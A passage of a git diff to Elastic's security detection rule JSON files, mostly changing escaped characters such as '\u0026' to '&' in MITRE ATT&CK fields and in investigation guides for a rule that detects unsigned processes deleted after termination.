populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_104.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_104.json index 24b15b9a911..d9f42c9608a 100644 --- a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_104.json @@ -42,7 +42,7 @@ ], "risk_score": 47, "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_105.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_105.json index c72b80e57ed..5bd17d4e0e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_105.json @@ -41,7 +41,7 @@ ], "risk_score": 47, "rule_id": "092b068f-84ac-485d-8a55-7dd9e006715f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_106.json b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_106.json index c2942dcb9dd..e3e08e9e006 100644 --- a/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/092b068f-84ac-485d-8a55-7dd9e006715f_106.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_103.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_103.json index 53c7e15ab7f..3f02f68780b 100644 --- a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_103.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_104.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_104.json index 20daa1e0154..cf2f865f3ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_104.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_105.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_105.json index 03437346d50..fdc270330a2 100644 --- a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_105.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Termination followed by Deletion", - "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"end\" and\n process.code_signature.trusted != true and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where host.os.type == \"windows\" and event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\") and\n not file.path : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n ] by file.path\n", "related_integrations": [ { @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_106.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_106.json index bb5c07f11be..41f222b4d07 100644 --- a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_106.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Termination followed by Deletion", - "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"end\" and\n process.code_signature.trusted != true and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where host.os.type == \"windows\" and event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\") and\n not file.path : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\")\n ] by file.path\n", "related_integrations": [ { @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_107.json b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_107.json index 7a95058ce16..09e05447717 100644 --- a/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/09443c92-46b3-45a4-8f25-383b028b258d_107.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Termination followed by Deletion", - "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Process Termination followed by Deletion\n\nThis rule identifies an unsigned process termination event quickly followed by the deletion of its executable file. Attackers can delete programs after their execution in an attempt to cover their tracks in a host.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately, as programs that exhibit this behavior, such as installers and similar utilities, should be signed. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"end\" and\n process.code_signature.trusted != true and\n not process.executable : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*.exe\", \"C:\\\\Windows\\\\WinSxS\\\\*.exe\")\n ] by process.executable\n [file where host.os.type == \"windows\" and event.type == \"deletion\" and file.extension : (\"exe\", \"scr\", \"com\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\") and\n not file.path : (\"?:\\\\Program Files\\\\*.exe\", 